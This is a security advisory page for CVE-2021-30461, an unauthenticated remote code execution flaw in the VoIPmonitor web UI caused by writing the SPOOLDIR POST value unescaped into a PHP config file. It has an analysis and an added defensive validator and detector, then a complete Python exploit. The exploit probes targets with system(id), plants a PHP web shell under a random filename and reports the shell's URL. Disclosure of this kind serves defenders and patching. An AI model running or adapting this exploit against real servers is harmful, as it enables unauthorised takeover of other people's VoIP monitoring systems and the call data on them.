# SSD Advisory – VoIPmonitor UnAuth RCE
May 6, 2021 [SSD Disclosure / Technical Lead](https://ssd-disclosure.com/author/noamr/) [Uncategorized](https://ssd-disclosure.com/category/uncategorized/)
**TL;DR**
Find out how a vulnerability in VoIPmonitor allows an unauthenticated attacker to execute arbitrary code.
**Vulnerability Summary**
VoIPmonitor is “open source network packet sniffer with commercial frontend for SIP RTP and RTCP VoIP protocols running on linux”.
The use of user-supplied data arriving via the web interface allows remote unauthenticated users to trigger a remote PHP code execution vulnerability in VoIPmonitor.
**CVE**
CVE-2021-30461
**Credit**
An independent security researcher, Furkan Göksel, has reported this vulnerability to the SSD Secure Disclosure program.
**Affected Versions**
VoIPmonitor version 24.60 and prior
**Vendor Response**
“A new GUI release 24.61 is fixing this security issue.”
**Vulnerability Analysis**
Due to improper filtering of malicious function calls, an attacker is able to run commands via the PHP application of VoIPmonitor’s web UI.
The vulnerability can be triggered when a POST request is made to the index.php file with the `SPOOLDIR` and `recheck` parameters.
This is because the `SPOOLDIR` value is written into the `config/configuration.php` file, which is later called by the UI.
The `SPOOLDIR` value is placed “as is” in the PHP source code, allowing remote attackers to insert arbitrary commands along with the intended value for this parameter.
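An added example (not from the advisory or from VoIPmonitor's code) of the defensive side of this flaw: an allowlist check for `SPOOLDIR`, a writer that encodes the value as a PHP string literal instead of pasting it in raw, and a detector for `recheck` POST bodies whose `SPOOLDIR` fails the check. The path allowlist, the `define(...)` line format and the sample request bodies are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Assumption: a spool directory is an absolute POSIX path using only these characters.
SAFE_PATH = re.compile(r"/[A-Za-z0-9._/-]*")

def is_safe_spooldir(value: str) -> bool:
    """Allowlist check: absolute path, no quotes or parentheses, no '..' segment."""
    return bool(SAFE_PATH.fullmatch(value)) and ".." not in value.split("/")

def php_single_quoted(value: str) -> str:
    """Encode as a PHP single-quoted literal; only backslash and ' are special there."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"

def render_config_line(value: str) -> str:
    """Hardened writer: validate, then encode. Raw input never reaches PHP source.
    The define(...) layout is hypothetical; the page does not show the real file."""
    if not is_safe_spooldir(value):
        raise ValueError("rejected SPOOLDIR value")
    return f"define('SPOOLDIR', {php_single_quoted(value)});"

def flag_request(body: str) -> bool:
    """Detection: True when a recheck POST carries a SPOOLDIR that fails the allowlist."""
    form = parse_qs(body, keep_blank_values=True)
    if "recheck" not in form:
        return False
    return any(not is_safe_spooldir(v) for v in form.get("SPOOLDIR", []))

# Constructed sample POST bodies; the second reuses the probe value from the PoC on this page.
SAMPLE_BODIES = [
    "SPOOLDIR=%2Fvar%2Fspool%2Fvoipmonitor&recheck=1",
    "SPOOLDIR=test%22.system%28id%29.%22&recheck=annen",
    "SPOOLDIR=%2Ftmp&recheck=annen",
]

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print("ALERT" if flag_request(body) else "ok   ", body)
    print(render_config_line("/var/spool/voipmonitor"))
```

The detector only flags values that break the path allowlist, so it is a complement to upgrading to the fixed GUI release, not a replacement for it.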
**Exploit**
```python
import argparse
from sys import argv,exit
import time
import random
import string

try:
    import requests
except ImportError:
    print("pip3 install requests ")

print("""
###############################################
#              VOIP Monitor RCE               #
###############################################
""")

headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Connection": "close"}


def get_target(args):
    hostname = args.host
    path = args.path
    if path:
        return f"http://{hostname}/{path}/index.php"
    else:
        return f"http://{hostname}/index.php"

def set_tmp(args):
    global headers
    target = get_target(args)
    n_data = {"SPOOLDIR": "/tmp", "recheck": "annen"}
    set_totmp = requests.post(target, n_data, headers=headers)
    print(f"[*] set /tmp {set_totmp}")


def checkVulnerability(args):
    global headers
    target = get_target(args)
    print(f"[+] Attacking {target}")
    testcmd = {"SPOOLDIR": "test\".system(id).\"", "recheck": "annen"}
    response_text = b"uid="
    testcmd_req = requests.post(target, testcmd, verify=False, headers=headers)
    if response_text in testcmd_req.content:
        print("[*] host is vulnerable")
    else:
        print("[-] host is not vulnerable")
        exit()


def uploadshell(args):
    global headers
    hostname = args.host
    path = args.path
    shell_path = ""
    shellfilename = str ( ''.join(random.choice(string.ascii_lowercase) for i in range(10)) )
    target = get_target(args)
    rce_payload = {"SPOOLDIR": f"/tmp\".file_put_contents('{shellfilename}.php','<?php echo system($_GET[\"a\"]);').\"", "recheck": "annen"}
    rce_req = requests.post(target, headers=headers, data=rce_payload)
    print(f"[*] uploading shell {rce_req.status_code}")
    if path:
        shell_path = f"http://{hostname}/{path}/{shellfilename}.php"
    else:
        shell_path = f"http://{hostname}/{shellfilename}.php"
    shell_check = requests.get(shell_path, headers=headers, params={'a':'id'})
    print(f"[*] RCE Check : {shell_check.text}")
    print(f"[*] Your Shell at {shell_path}")


def main():
    parser = argparse.ArgumentParser(description='VoIP Monitor all versions command execution')
    parser.add_argument('-t','--host',help='Host', type=str)
    parser.add_argument('-b', '--path',help='Path of the VoIP Monitor', type=str)
    args = parser.parse_args()
    set_tmp(args)
    checkVulnerability(args)
    set_tmp(args)
    uploadshell(args)
    set_tmp(args)


if __name__ == "__main__":
    main()
```